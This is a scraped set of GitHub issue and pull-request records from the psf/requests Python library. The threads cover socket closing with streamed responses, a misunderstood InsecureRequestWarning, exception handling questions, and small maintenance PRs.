{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2399/reactions" }
https://api.github.com/repos/psf/requests/issues/2399/timeline
null
completed
null
null
false
[ "That's not a bad idea. Some notes:\n1. `response.content` may take a very long time to return if timeouts aren't configured. Closing shouldn't hang.\n2. `Response.content` may throw exceptions.\n\nWe need to decide how we're dealing with these problems.\n", "Thank you for helping with this!\n\nTrying to clarify a bit what's happening..\nAs @sigmavirus24 mentioned, I'm using [`rq`](https://github.com/nvie/rq/) and [`summary`](https://github.com/svven/summary/) to process a bunch of URLs. I start several simple (forking) [workers](http://python-rq.org/docs/workers/) so they are doing one URL per job in totally separate processes on the same machine. It all goes fine for a while and suddenly, for no apparent reason, all workers hang at the same time at this line:\n\nhttps://github.com/svven/summary/blob/master/summary/__init__.py#L193\n\nBy hanging I mean suspending the running job and leaving it in the _started_ state. There's no exception whatsoever and it doesn't get passed that line so the job is not finished properly. Then it gets to the next job and does the same thing going on in this \"strike\" mode until the main worker process is killed. All running workers behave this way. Newly started workers perform properly though.\n\nIt's a very peculiar issue and I haven't been able to reproduce it. It just happens after a while - few hours or even days, probably depending on the number of URLs that had been processed.\n\nRunning out of available sockets may be the cause of the problem, I think it's a good assumption but I didn't verify it yet. What puzzles me is the fact that I get no exception whatsoever, the child (forked) process doing the job simply dies at that line.\n", "> That's not a bad idea.\n\nI'm also not entirely certain it's a good idea for the reasons you mentioned. The major benefit is that it would then match exactly the behaviour most users seem to expect from it.\n", "Regarding the proposed solution, isn't it enough to `self.raw.release_conn()` while closing?\n\nI don't want to be picky but reading the whole response would trash a good part of `summary`. As stated there, \"summary extraction is performed gradually by parsing the HTML <head> tag first, applying specific head extraction techniques, and goes on to the <body> only if data is not complete.\"\n\nOh by the way, while iterating the HTML response, the routine starts iterating through image files from that page and does so in the same manner having `stream=True`. So basically:\n\n``` python\nwith contextlib.closing(requests.get(html_url, stream=True)) as html_response:\n # do some stuff with html_response like getting the img_url\n with contextlib.closing(requests.get(img_url, stream=True)) as img_response:\n # check the image file\n```\n\nIs this bad? Still it is working fine for a while.. but it may keep sockets from being released I guess..\n\nAnyways if you have any hints please let me know, cheers\n", "> Regarding the proposed solution, isn't it enough to self.raw.release_conn() while closing?\n\nNo. That releases a connection back to the connection pool in urllib3 which does not necessarily close the underlying socket.\n\n> Is this bad?\n\nNot exactly. If you weren't using `stream=True` in the first place, you would get a performance benefit from using a session if `html_url` and `img_url` used the same scheme and host. Since you are using `stream=True` you're still creating 2 sockets (which are the expensive part of the request/response cycle). That's probably more information than you wanted to know, but I thought you might be interested anyway.\n\n> I don't want to be picky but reading the whole response would trash a good part of summary.\n\nThere isn't a really good way to forcibly close the socket otherwise. Not without digging 6 or 10 layers deep into the response object from urllib3 to find the socket. I've been down those layers before, and most of the paths are through internal (private) methods and attributes which no one should be relying on for any reason.\n", "Also, I'd expect the 'running out of sockets' case not to be a 'block forever' error mode, but a 'die instantly' mode. If you hit your ulimit I'm pretty sure you get killed.\n", "Yes that's exactly what happens - it doesn't 'block at all', but it just 'dies instantly'.\n\nI'll try to monitor the sockets and verify this assumption, but if 'running out of sockets' is the reason, how can I prevent this from happening? Isn't there a way to get an exception in this case? To me this looks like a bug, especially if the sockets are not released in case of partial requests.get with stream=True.\n", "I wonder if calling `select` and checking if the socket is marked readable is a good idea. If it is we can pre-emptively close it, because either there's still data on it (and so it hasn't been exhausted) or it was closed remotely (and so closing it here is a no-op). @sigmavirus24?\n", "(Note that doing this might belong in urllib3: @shazow?)\n", "Maybe I'm missing something, but shouldn't we close the socket on [`Response.close()`](https://github.com/kennethreitz/requests/blob/7612015424c88cfd98f6be692ff994898aee1502/requests/models.py#L833)? \nI mean even for streaming requests, closing the response means one doesn't care about the rest of the data, so why keep the socket open?\n", "> I wonder if calling select and checking if the socket is marked readable is a good idea.\n\nIsn't select a problem on Windows?\n\n> Maybe I'm missing something, but shouldn't we close the socket on Response.close()? \n\nQuoting myself from a few comments up:\n\n> There isn't a really good way to forcibly close the socket otherwise. Not without digging 6 or 10 layers deep into the response object from urllib3 to find the socket. I've been down those layers before, and most of the paths are through internal (private) methods and attributes which no one should be relying on for any reason.\n\nFurther, `summary` will probably already get \"trashed\" if at any point you receive a redirect that has a body. We use the same logic as I'm proposing for `Response.close` when following redirects to prevent a socket leak in the case where `stream=True`.\n", "Select is fine, poll is nonexistent on Windows.\n", "@sigmavirus24: Ok I understand there's no easy way to access the socket..\nBut in my opinion, reading the whole content of the response when `stream=True` defies the purpose of having the streaming feature, isn't it?\n\nAnyway if `requests` follows the redirects there's no problem with `summary`. It actually follows http_equiv_refresh \"redirects\" as well: https://github.com/svven/summary/blob/master/summary/__init__.py#L209\n\nGetting back to the actual issue..\nI'm trying to reproduce the problem like this: https://gist.github.com/ducu/a684c1e96afdaf2c5657\n\nDo you think that [`psutil.Process.connections`](https://pythonhosted.org/psutil/#psutil.Process.connections) would show leaking sockets? Didn't try it properly yet but seen it running on Windows and Ubuntu, interesting how they behave differently, but no signs of leaking sockets for ~300 URLs.\nI'll try it out on OS X tonight where I experienced the \"worker strike\" issue, and I'll feed it more URLs.\nAm I on the right track here?\n", "> Select is fine, poll is nonexistent on Windows.\n\nRight. I always think poll is affected too. Sorry.\n\n> Anyway if requests follows the redirects there're no problem with summary.\n\nIf the request is empty there's no problem for you. If it isn't empty then we have to consume the entire socket which is exactly what I'm proposing we do here to fix it. So if you're encountering redirects in any number and summary isn't having problems with them, then this solution shouldn't \"trash\" summary either. Have you done any performance benchmarks to see if this has a realistic effect on summary's performance or is this a pre-benchmark optimization?\n", "> Do you think that psutil.Process.connections would show leaking sockets? \n\nJudging by the documentation it should show sockets that are potentially still open. I've had mixed luck with psutil in trying to reproduce other things though that system tools generally seem to handle better.\n\n> Didn't try it properly yet but seen it running on Windows and Ubuntu, interesting how they behave differently, but no signs of leaking sockets for ~300 URLs.\n\nDidn't you say this took days to occur? I doubt it would appear overnight if you've only encountered it after days of summary running.\n\n> I'll try it out on OS X tonight where I experienced the \"worker strike\" issue, and I'll feed it more URLs.\n> Am I on the right track here?\n\nIt would seem so, but I'd rather keep the discussion of the enhancement at the core of this issue. If you want help debugging this, we can do it in IRC.\n", "> Have you done any performance benchmarks to see if this has a realistic effect on summary's performance or is this a pre-benchmark optimization?\n\nNope, pre-benchmark optimization indeed but also empirical observation.\nI know that establishing connections is the expensive part as you said, but still I'd like to avoid downloading useless content if possible.\n\n> Didn't you say this took days to occur? \n\nYes indeed, it will take a while to reproduce this, maybe I'll switch to using `summary` instead of `requests` and see the difference in socket usage. If that doesn't work I'll throw in `rq` as well.\n\nRegarding the enhancement I can't say much and maybe I didn't quite get your proposed solution. \nBut it seems that by getting the whole content you're turning a streaming request into a regular one. \n", "> I wonder if calling select and checking if the socket is marked readable is a good idea. If it is we can pre-emptively close it, because either there's still data on it (and so it hasn't been exhausted) or it was closed remotely (and so closing it here is a no-op)\n\nI've always assumed that this is in effect what https://github.com/shazow/urllib3/blob/master/urllib3/util/connection.py#L12 does, among other things.\n\nI'm not sure always consuming a socket before closing is a great idea, there could be a lot to consume or it could be a never-ending streaming connection etc.\n", "> I'm not sure always consuming a socket before closing is a great idea, there could be a lot to consume or it could be a never-ending streaming connection etc.\n\nExactly my point. Any other suggestions?\n\n—\nSent from Mailbox\n", "> Exactly my point. Any other suggestions?\n\nIt seems this thread is on the right track. Closing a socket should be sufficient, need to figure out why it's not working as expected in this case.\n", "Sorry guys, it's not what we assumed, the sockets are being closed properly.\n\nIt's a different problem which has to do with `requests` being used in both a main process and a forked process -- the `rq` worker script. If the network goes down even for a short while, `requests` raises few exceptions then it becomes unusable and the forked processes get killed instantly if they try to use it. This messes up `rq` jobs by leaving them in the 'started' status, so this is also an `rq` issue (https://github.com/nvie/rq/issues/473).\n\nI've put up a [gist](https://gist.github.com/ducu/ee8c0b1028775df6c72e) to reproduce the problem, but I'll create a new bug ticket and describe it there.\n\nThanks a lot for your support\n" ]
https://api.github.com/repos/psf/requests/issues/2398
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2398/labels{/name}
https://api.github.com/repos/psf/requests/issues/2398/comments
https://api.github.com/repos/psf/requests/issues/2398/events
https://github.com/psf/requests/issues/2398
53,357,804
MDU6SXNzdWU1MzM1NzgwNA==
2,398
Clarify InsecureRequestWarning and verify=True in docs
{ "avatar_url": "https://avatars.githubusercontent.com/u/109467?v=4", "events_url": "https://api.github.com/users/rsyring/events{/privacy}", "followers_url": "https://api.github.com/users/rsyring/followers", "following_url": "https://api.github.com/users/rsyring/following{/other_user}", "gists_url": "https://api.github.com/users/rsyring/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/rsyring", "id": 109467, "login": "rsyring", "node_id": "MDQ6VXNlcjEwOTQ2Nw==", "organizations_url": "https://api.github.com/users/rsyring/orgs", "received_events_url": "https://api.github.com/users/rsyring/received_events", "repos_url": "https://api.github.com/users/rsyring/repos", "site_admin": false, "starred_url": "https://api.github.com/users/rsyring/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/rsyring/subscriptions", "type": "User", "url": "https://api.github.com/users/rsyring", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-05T02:05:53Z
2021-09-08T23:06:14Z
2015-01-05T02:36:36Z
NONE
resolved
The docs: http://docs.python-requests.org/en/latest/user/advanced/#ssl-cert-verification say: > By default, verify is set to True. Option verify only applies to host certs. If my HTTPS connection is being verified by default, why am I also seeing a InsecureRequestWarning? Clarifying this situation and updating the docs with more info would be helpful IMO.
{ "avatar_url": "https://avatars.githubusercontent.com/u/109467?v=4", "events_url": "https://api.github.com/users/rsyring/events{/privacy}", "followers_url": "https://api.github.com/users/rsyring/followers", "following_url": "https://api.github.com/users/rsyring/following{/other_user}", "gists_url": "https://api.github.com/users/rsyring/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/rsyring", "id": 109467, "login": "rsyring", "node_id": "MDQ6VXNlcjEwOTQ2Nw==", "organizations_url": "https://api.github.com/users/rsyring/orgs", "received_events_url": "https://api.github.com/users/rsyring/received_events", "repos_url": "https://api.github.com/users/rsyring/repos", "site_admin": false, "starred_url": "https://api.github.com/users/rsyring/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/rsyring/subscriptions", "type": "User", "url": "https://api.github.com/users/rsyring", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2398/reactions" }
https://api.github.com/repos/psf/requests/issues/2398/timeline
null
completed
null
null
false
[ "> If my HTTPS connection is being verified by default, why am I also seeing a InsecureRequestWarning? Clarifying this situation and updating the docs with more info would be helpful IMO.\n\nI don't know why. Can you give us any details to help you?\n", "> I don't know why. Can you give us any details to help you?\n\nThank you for the prompt response. Actually, this was my fault. I didn't realize I was using a session that had verify=False. The warning did exactly what it was supposed to, I just thought it was someone elses's fault! :o/\n\nThanks again.\n", "Hah. No worries.\n" ]
https://api.github.com/repos/psf/requests/issues/2397
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2397/labels{/name}
https://api.github.com/repos/psf/requests/issues/2397/comments
https://api.github.com/repos/psf/requests/issues/2397/events
https://github.com/psf/requests/issues/2397
53,324,502
MDU6SXNzdWU1MzMyNDUwMg==
2,397
how can I get the "exception code"
{ "avatar_url": "https://avatars.githubusercontent.com/u/9110611?v=4", "events_url": "https://api.github.com/users/tdyhacker/events{/privacy}", "followers_url": "https://api.github.com/users/tdyhacker/followers", "following_url": "https://api.github.com/users/tdyhacker/following{/other_user}", "gists_url": "https://api.github.com/users/tdyhacker/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tdyhacker", "id": 9110611, "login": "tdyhacker", "node_id": "MDQ6VXNlcjkxMTA2MTE=", "organizations_url": "https://api.github.com/users/tdyhacker/orgs", "received_events_url": "https://api.github.com/users/tdyhacker/received_events", "repos_url": "https://api.github.com/users/tdyhacker/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tdyhacker/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tdyhacker/subscriptions", "type": "User", "url": "https://api.github.com/users/tdyhacker", "user_view_type": "public" }
[ { "color": "777777", "default": false, "description": null, "id": 162780722, "name": "Question/Not a bug", "node_id": "MDU6TGFiZWwxNjI3ODA3MjI=", "url": "https://api.github.com/repos/psf/requests/labels/Question/Not%20a%20bug" } ]
closed
true
null
[]
null
1
2015-01-04T04:06:28Z
2021-09-08T23:06:47Z
2015-01-04T04:10:22Z
NONE
resolved
I am using "requests (2.5.1)" .now I want to catch the exception and return an dict with some exception message,the dict I will return is as following: ``` { "status_code": 61, # exception code, "msg": "error msg", } ``` but now I can't get the error status_code and error message,I try to use ``` except requests.exceptions.ConnectionError as e: response={ u'status_code':4040, u'errno': e.errno, u'message': (e.message.reason), u'strerror': e.strerror, u'response':e.response, } ``` but it's too redundancy,how can I get the error message simplicity?anyone can give some idea?
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2397/reactions" }
https://api.github.com/repos/psf/requests/issues/2397/timeline
null
completed
null
null
false
[ "Questions belong on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests).\n" ]
https://api.github.com/repos/psf/requests/issues/2396
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2396/labels{/name}
https://api.github.com/repos/psf/requests/issues/2396/comments
https://api.github.com/repos/psf/requests/issues/2396/events
https://github.com/psf/requests/pull/2396
53,232,433
MDExOlB1bGxSZXF1ZXN0MjY3NDc4NDU=
2,396
Improving format (whitespace related PEP8).
{ "avatar_url": "https://avatars.githubusercontent.com/u/3359485?v=4", "events_url": "https://api.github.com/users/rtzll/events{/privacy}", "followers_url": "https://api.github.com/users/rtzll/followers", "following_url": "https://api.github.com/users/rtzll/following{/other_user}", "gists_url": "https://api.github.com/users/rtzll/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/rtzll", "id": 3359485, "login": "rtzll", "node_id": "MDQ6VXNlcjMzNTk0ODU=", "organizations_url": "https://api.github.com/users/rtzll/orgs", "received_events_url": "https://api.github.com/users/rtzll/received_events", "repos_url": "https://api.github.com/users/rtzll/repos", "site_admin": false, "starred_url": "https://api.github.com/users/rtzll/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/rtzll/subscriptions", "type": "User", "url": "https://api.github.com/users/rtzll", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2015-01-02T00:11:24Z
2021-09-08T09:01:02Z
2015-01-02T00:31:02Z
NONE
resolved
A few instances of to much or to few whitespace.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2396/reactions" }
https://api.github.com/repos/psf/requests/issues/2396/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2396.diff", "html_url": "https://github.com/psf/requests/pull/2396", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2396.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2396" }
true
[ "requests does not follow PEP8. Kenneth disagrees with many of the suggestions. You can read more on #1543, #1964, and #2298 \n" ]
https://api.github.com/repos/psf/requests/issues/2395
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2395/labels{/name}
https://api.github.com/repos/psf/requests/issues/2395/comments
https://api.github.com/repos/psf/requests/issues/2395/events
https://github.com/psf/requests/pull/2395
53,212,239
MDExOlB1bGxSZXF1ZXN0MjY3NDAzMzI=
2,395
Changing year in all copyright information
{ "avatar_url": "https://avatars.githubusercontent.com/u/240368?v=4", "events_url": "https://api.github.com/users/shrayasr/events{/privacy}", "followers_url": "https://api.github.com/users/shrayasr/followers", "following_url": "https://api.github.com/users/shrayasr/following{/other_user}", "gists_url": "https://api.github.com/users/shrayasr/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/shrayasr", "id": 240368, "login": "shrayasr", "node_id": "MDQ6VXNlcjI0MDM2OA==", "organizations_url": "https://api.github.com/users/shrayasr/orgs", "received_events_url": "https://api.github.com/users/shrayasr/received_events", "repos_url": "https://api.github.com/users/shrayasr/repos", "site_admin": false, "starred_url": "https://api.github.com/users/shrayasr/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/shrayasr/subscriptions", "type": "User", "url": "https://api.github.com/users/shrayasr", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-01T03:36:18Z
2021-09-08T09:01:03Z
2015-01-01T08:28:11Z
CONTRIBUTOR
resolved
:tada: :tada: Happy new year! Thanks for this awesome library :) :tada: :tada:
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2395/reactions" }
https://api.github.com/repos/psf/requests/issues/2395/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2395.diff", "html_url": "https://github.com/psf/requests/pull/2395", "merged_at": "2015-01-01T08:28:11Z", "patch_url": "https://github.com/psf/requests/pull/2395.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2395" }
true
[ ":tada: :balloon: :cake:\n\nThanks so much!\n", ":) Hope you had a good one!\n" ]
https://api.github.com/repos/psf/requests/issues/2394
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2394/labels{/name}
https://api.github.com/repos/psf/requests/issues/2394/comments
https://api.github.com/repos/psf/requests/issues/2394/events
https://github.com/psf/requests/issues/2394
53,193,747
MDU6SXNzdWU1MzE5Mzc0Nw==
2,394
verify is sticky in Session
{ "avatar_url": "https://avatars.githubusercontent.com/u/4239113?v=4", "events_url": "https://api.github.com/users/slowaak/events{/privacy}", "followers_url": "https://api.github.com/users/slowaak/followers", "following_url": "https://api.github.com/users/slowaak/following{/other_user}", "gists_url": "https://api.github.com/users/slowaak/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/slowaak", "id": 4239113, "login": "slowaak", "node_id": "MDQ6VXNlcjQyMzkxMTM=", "organizations_url": "https://api.github.com/users/slowaak/orgs", "received_events_url": "https://api.github.com/users/slowaak/received_events", "repos_url": "https://api.github.com/users/slowaak/repos", "site_admin": false, "starred_url": "https://api.github.com/users/slowaak/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/slowaak/subscriptions", "type": "User", "url": "https://api.github.com/users/slowaak", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-31T17:23:52Z
2021-09-08T23:06:48Z
2014-12-31T17:25:40Z
NONE
resolved
I'm using Session.request to do GET from a HTTPS URL where the the server side certificate may be invalid. For testing purposes, if the certificate is invalid, I want to retry the GET with 'verify=False'. I'm reusing the Session for the retry, but the second request also fails even though I specify 'verify=False' in the request. It seems that the verify state is persisted in the Session somewhere and not updated from the request parameters if already set in a previous request. Is this the expected behavior? It seems unusual to me. If I create a new Session for the second request the certificate doesn't get checked in this request.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2394/reactions" }
https://api.github.com/repos/psf/requests/issues/2394/timeline
null
completed
null
null
false
[ "This is a duplicate of #2255.\n" ]
https://api.github.com/repos/psf/requests/issues/2393
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2393/labels{/name}
https://api.github.com/repos/psf/requests/issues/2393/comments
https://api.github.com/repos/psf/requests/issues/2393/events
https://github.com/psf/requests/pull/2393
52,945,755
MDExOlB1bGxSZXF1ZXN0MjY2MTAxMjk=
2,393
Attempt to quote anyway if unquoting fails
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
{ "closed_at": "2015-04-06T01:57:33Z", "closed_issues": 4, "created_at": "2015-01-18T20:07:00Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }, "description": "", "due_on": null, "html_url": "https://github.com/psf/requests/milestone/23", "id": 940764, "labels_url": "https://api.github.com/repos/psf/requests/milestones/23/labels", "node_id": "MDk6TWlsZXN0b25lOTQwNzY0", "number": 23, "open_issues": 0, "state": "closed", "title": "2.6.0", "updated_at": "2015-04-06T01:57:33Z", "url": "https://api.github.com/repos/psf/requests/milestones/23" }
9
2014-12-27T02:06:03Z
2021-09-08T09:00:59Z
2015-01-27T18:24:34Z
CONTRIBUTOR
resolved
Fixes #2356 TODO - [x] Add test
